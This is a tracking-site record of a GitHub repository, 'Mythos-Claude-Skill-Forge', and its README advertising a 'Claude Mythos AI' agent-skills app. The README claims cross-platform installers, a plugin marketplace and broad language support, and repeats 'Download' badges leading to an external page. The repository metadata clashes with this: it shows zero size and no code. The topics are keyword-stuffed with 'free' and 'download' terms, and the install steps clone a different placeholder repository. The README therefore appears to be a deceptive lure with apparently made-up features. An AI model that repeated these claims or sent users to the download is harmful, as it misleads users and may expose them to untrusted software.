[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-78809":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":12,"openIssues":11,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":13,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":11,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":14,"fork":14,"defaultBranch":15,"hasWiki":16,"hasPages":14,"topics":17,"createdAt":9,"pushedAt":9,"updatedAt":38,"readmeContent":39,"aiSummary":40,"trendingCount":11,"starSnapshotCount":11,"syncStatus":41,"lastSyncTime":42,"discoverSource":43},78809,"Mythos-Claude-Skill-Forge","rayhayqal\u002FMythos-Claude-Skill-Forge","rayhayqal","🚀 Claude Mythos AI 2026 – Build Autonomous Agent Skills & Plugins for Next-Gen Apps",null,422,0,192,1,false,"main",true,[18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37],"claude","claude-ai","claude-code","claude-code-cli","claude-code-hooks","claude-code-marketplace","claude-code-plugin","claude-code-plugins","claude-code-skill","claude-code-skills","claude-code-subagents","claude-cowork-free","claude-design-ai","claude-design-alternative","claude-design-download","claude-design-free","claude-mythos","claude-opus","claude-opus-4-6","mythos","2026-06-12 02:03:48","# Claude Mythos AI - Anthropic App\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Frayhayqal.github.io)\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT)\n[![Python Version](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpython-3.10%20%7C%203.11%20%7C%203.12-blue)](https:\u002F\u002Fwww.python.org\u002F)\n[![Claude API](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FClaude%20API-3.5%20Sonnet%20%7C%20Opus-8A2BE2)](https:\u002F\u002Fwww.anthropic.com\u002F)\n[![OpenAI Compatible](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FOpenAI-Compatible-412991)](https:\u002F\u002Fopenai.com\u002F)\n\n---\n\n## 🌌 Overview: The Mythos Engine\n\nClaude Mythos AI is not merely an application—it is an **interpretive bridge** between human intent and machine cognition. Think of it as a **multiversal translator** for AI interactions: it takes the raw potential of Claude's architecture and refracts it through a prism of customizable \"mythos layers\"—narrative lenses, behavioral archetypes, and contextual frameworks that transform a generic AI assistant into a specialized **digital artisan**.\n\nWhere standard AI tools give you a hammer, Claude Mythos gives you a **workshop of instruments**—each tuned to a different frequency of problem-solving, creativity, or analysis.\n\nThe repository serves as the **nexus** for Claude Code integration, subagent orchestration, hooks management, and design-oriented AI workflows. It is built for developers, designers, and thinkers who refuse to accept one-dimensional AI interactions.\n\n---\n\n## 🏛️ Architecture: The Mythos Framework\n\n```mermaid\ngraph TB\n    subgraph \"User Interface Layer\"\n        UI[Responsive Web UI]\n        CLI[Claude Code CLI]\n        HOOKS[Claude Code Hooks]\n    end\n\n    subgraph \"Mythos Core Engine\"\n        ORCH[Mythos Orchestrator]\n        LENS[Contextual Lens System]\n        PROFILER[Behavioral Profiler]\n    end\n\n    subgraph \"Skill & Agent Ecosystem\"\n        SUB[Subagent Manager]\n        SKILL[Skill Marketplace]\n        PLUG[Plugin Registry]\n    end\n\n    subgraph \"AI Backend Layer\"\n        CLAUDE[Claude API - Opus\u002FSonnet]\n        OPENAI[OpenAI API Compatibility]\n        HYBRID[Hybrid Inference Router]\n    end\n\n    subgraph \"Data & Persistence\"\n        MEM[Conversation Memory]\n        CACHE[Response Cache]\n        CONFIG[Profile Config Store]\n    end\n\n    UI --> ORCH\n    CLI --> ORCH\n    HOOKS --> ORCH\n    ORCH --> LENS\n    ORCH --> PROFILER\n    LENS --> SUB\n    PROFILER --> SKILL\n    SUB --> PLUG\n    SKILL --> CLAUDE\n    PLUG --> OPENAI\n    CLAUDE --> HYBRID\n    OPENAI --> HYBRID\n    HYBRID --> MEM\n    MEM --> CACHE\n    CACHE --> CONFIG\n```\n\nThe architecture follows a **river-delta pattern**: a single input stream (your request) is channeled through multiple branches of interpretation (the Mythos lenses), enriched by specialized subagents, and finally converges into a response that carries the depth of the entire system.\n\n---\n\n## ✨ Key Features\n\n### 🧠 **Intelligent Lens System**\nEach \"mythos\" is a behavioral lens that reshapes Claude's responses. Available lenses include:\n- **The Socratic Lens** — questions before answers, ideal for debugging and problem decomposition\n- **The Artisan Lens** — crafts responses with aesthetic and structural precision\n- **The Analyst Lens** — statistical rigor and data-first thinking\n- **The Mentor Lens** — gentle guidance with progressive complexity\n- **The Mythmaker Lens** — narrative-first explanations using metaphor and story\n\n### 🔌 **Claude Code Ecosystem Integration**\n- **Hooks System**: Pre- and post-execution hooks for custom validation, logging, or transformation\n- **Subagent Orchestration**: Deploy specialized code-subagents that handle parallel tasks (testing, documentation, refactoring)\n- **Skill Marketplace**: Import\u002Fexport community-created skills from the Claude Code marketplace\n- **Plugin Architecture**: Extensible plugin registry with hot-reload capability\n\n### 🌐 **Multilingual Semantic Core**\nSupports **47 languages** at the semantic level—not just translation, but cultural context adaptation. A business query in Japanese receives honorific-aware structuring; a technical query in German benefits from compound-word decomposition.\n\n### 📱 **Responsive Interface Trinity**\n| Interface | Purpose | Platform |\n|-----------|---------|----------|\n| **Web Dashboard** | Full configuration and monitoring | Desktop\u002FTablet |\n| **CLI Console** | Power-user automation | Terminal |\n| **Compact UI** | Quick interactions | Mobile\u002FEmbedded |\n\n### ⚡ **24\u002F7 Pipeline Reliability**\nThe system includes an **automatic failover cascade**: if the primary Claude API endpoint experiences latency, requests are routed through secondary endpoints or cached response patterns. This ensures your workflows continue without interruption.\n\n---\n\n## 🖥️ OS Compatibility\n\n| Operating System | Support Level | Notes |\n|-----------------|---------------|-------|\n| ![Windows](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FWindows-0078D6?style=flat&logo=windows&logoColor=white) | ✅ Full Support | Native installer, WSL2 integration |\n| ![macOS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FmacOS-000000?style=flat&logo=apple&logoColor=white) | ✅ Full Support | Apple Silicon native, Homebrew tap |\n| ![Linux](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLinux-FCC624?style=flat&logo=linux&logoColor=black) | ✅ Full Support | DEB\u002FRPM\u002FArch packages, Flatpak |\n| ![FreeBSD](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FFreeBSD-AB2B28?style=flat&logo=freebsd&logoColor=white) | ✅ Full Support | Ports collection |\n| ![iOS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FiOS-000000?style=flat&logo=ios&logoColor=white) | 🟡 Beta | Companion app |\n| ![Android](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FAndroid-3DDC84?style=flat&logo=android&logoColor=white) | 🟡 Beta | Companion app |\n\n---\n\n## ⚙️ Example Profile Configuration\n\nCreate a file named `mythos-profile.json` in the `~\u002F.claude-mythos\u002F` directory:\n\n```json\n{\n  \"profile_name\": \"full_stack_artisan\",\n  \"version\": \"2.1.0\",\n  \"active_lens\": \"artisan\",\n  \"fallback_lens\": \"analyst\",\n  \"subagents\": [\n    {\n      \"name\": \"code_reviewer\",\n      \"type\": \"claude-code-subagent\",\n      \"hooks\": [\"pre_commit\", \"post_lint\"],\n      \"skill_pack\": \"code_review_v2\"\n    },\n    {\n      \"name\": \"doc_generator\",\n      \"type\": \"claude-code-subagent\",\n      \"hooks\": [\"post_commit\"],\n      \"skill_pack\": \"documentation_automation\"\n    }\n  ],\n  \"behavioral_rules\": {\n    \"verbosity\": \"balanced\",\n    \"example_preference\": \"minimum_reproducible\",\n    \"code_style\": \"pep8_with_type_hints\",\n    \"explanation_depth\": \"adaptive\"\n  },\n  \"languages\": [\"python\", \"typescript\", \"rust\"],\n  \"marketplace_extensions\": [\n    \"claude-code-hooks-security-scanner\",\n    \"claude-code-plugins-dependency-grapher\"\n  ],\n  \"response_cache\": {\n    \"enabled\": true,\n    \"ttl_hours\": 24,\n    \"max_entries\": 500\n  }\n}\n```\n\n---\n\n## 🖥️ Example Console Invocation\n\n**Starting a mythos session:**\n\n```bash\nmythos --profile full_stack_artisan --lens mentor --session \"debug_session_01\"\n```\n\n**Invoking a subagent directly:**\n\n```bash\nmythos subagent run code_reviewer --target .\u002Fsrc\u002F --hooks pre_commit\n```\n\n**Listing available skills from the marketplace:**\n\n```bash\nmythos marketplace list --category code-review --rating 4\n```\n\n**Running a hook chain:**\n\n```bash\nmythos hook chain execute --hooks pre_commit,post_commit --profile web_dev\n```\n\n**Interactive lens switching within a session:**\n\n```bash\nmythos session lens-switch --to socratic --reason \"Need to understand root cause\"\n```\n\n---\n\n## 🔄 API Integration: Claude & OpenAI\n\nClaude Mythos AI functions as a **dual-oracle bridge**, capable of routing requests to either Claude's API or OpenAI's API with automatic context adaptation.\n\n### Claude API Integration\n\nThe system is optimized for **Claude Opus 4.6** and **Claude 3.5 Sonnet**, utilizing:\n- Extended thinking for complex reasoning tasks\n- Tool use for function calling\n- Vision capabilities for image analysis\n- Document processing for PDF, spreadsheet, and presentation files\n\n### OpenAI Compatibility Mode\n\nFor teams with existing OpenAI infrastructure, the Mythos Engine can **translate prompts and contexts** between the two ecosystems, preserving:\n- Function call schemas\n- System prompt structure\n- Response formatting patterns\n\n### Key Configuration\n\n```bash\n# Set primary API\nexport MYTHOS_PRIMARY_API=claude\nexport ANTHROPIC_API_KEY=sk-ant-...\nexport OPENAI_API_KEY=sk-proj-...\n\n# Enable hybrid routing\nexport MYTHOS_HYBRID_MODE=auto\nexport MYTHOS_FAILOVER_TIMEOUT=5000\n```\n\n---\n\n## 🔧 Quick Start\n\n### Prerequisites\n- Python 3.10+\n- An Anthropic API key (or OpenAI API key for compatibility mode)\n- `git` for marketplace extensions\n\n### Installation\n\n```bash\n# Clone the repository\ngit clone https:\u002F\u002Fgithub.com\u002Fyour-org\u002Fclaude-mythos-ai-anthropic-app\ncd claude-mythos-ai-anthropic-app\n\n# Install dependencies\npip install -r requirements.txt\n\n# Initialize configuration\nmythos init --profile default\n\n# Verify installation\nmythos doctor --check-all\n```\n\n---\n\n## 🎯 Use Cases & Metaphors\n\n### The Digital Cabinetmaker\nImagine AI as raw timber. The Mythos lenses are your chisels, planes, and sandpaper. With the Artisan Lens active, Claude doesn't just generate code—it **sculpts** it, considering grain (code structure), finish (naming conventions), and joinery (module interfaces).\n\n### The Architectural Dialog\nUsing the Socratic Lens in a debugging session is like having a senior architect who refuses to give you the answer—instead, they ask questions that make you rediscover the blueprint yourself. The result is deeper understanding, not just a fix.\n\n### The Multilingual Storyteller\nWhen the system translates your query into Japanese, it doesn't merely convert words. It understands that a request phrased as \"Could you check this code?\" deserves \"確認させていただいてもよろしいでしょうか。\"—a level of politeness that matches the cultural context.\n\n---\n\n## 🛠️ Marketplace & Community\n\nThe Claude Mythos ecosystem includes a **community-driven marketplace** where users share:\n- **Skills**: Reusable capabilities (e.g., \"automated database migration checker\")\n- **Hooks**: Pre\u002Fpost execution transformers\n- **Plugins**: Full feature extensions\n- **Lenses**: Custom behavioral frameworks\n\nEach marketplace item undergoes a **peer review process** before being listed as \"verified,\" ensuring quality without gatekeeping.\n\n---\n\n## ⚠️ Disclaimer\n\n**Important**: Claude Mythos AI is an independent project and is **not affiliated with, endorsed by, or sponsored by Anthropic, OpenAI, or any other AI provider**. \"Claude\" and \"Anthropic\" are trademarks of Anthropic, Inc. This project provides a custom interface and orchestration layer over official APIs. Users are responsible for:\n\n1. Complying with the respective API terms of service\n2. Ensuring their usage aligns with their organization's AI governance policies\n3. Reviewing output from any AI system before use in production environments\n4. Understanding that AI-generated content may contain errors, biases, or hallucinations\n\nThe project maintainers provide this software \"as is\" without warranty of any kind, express or implied. By using this software, you acknowledge that AI systems can produce unexpected results and that you assume all responsibility for your usage.\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License** - see the [LICENSE](https:\u002F\u002Frayhayqal.github.io) file for details.\n\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT)\n\n---\n\n## 🌟 Support & Community\n\n- **Documentation**: [Full Mythos Guide](https:\u002F\u002Frayhayqal.github.io)\n- **Discussions**: GitHub Discussions\n- **Issue Tracker**: Report bugs or suggest features via GitHub Issues\n- **Security**: Report vulnerabilities to our security contact\n\n---\n\n## 🗺️ Roadmap to 2026\n\n| Quarter | Milestone |\n|---------|-----------|\n| Q1 2026 | Stable plugin API v1.0 |\n| Q2 2026 | Multi-profile session merging |\n| Q3 2026 | Real-time collaborative mythos sessions |\n| Q4 2026 | Autonomous subagent negotiation |\n\n---\n\n*Claude Mythos AI — Because intelligence without context is just computation.*\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Frayhayqal.github.io)","Claude Mythos AI 是一个用于构建下一代应用程序的自主代理技能和插件的平台。它通过自定义的“神话层”（包括叙事视角、行为原型和上下文框架）将 Claude 的通用架构转化为特定领域的数字工匠，从而实现更加个性化和多维度的人机交互。项目的核心功能包括智能镜头系统、子代理管理和插件注册等，支持Python 3.10至3.12版本，并兼容Claude API与OpenAI API。适合开发者、设计师以及寻求超越传统单一维度AI互动体验的思想者使用，在需要高度定制化AI解决方案的场景中尤为适用。",2,"2026-05-25 02:30:04","CREATED_QUERY"]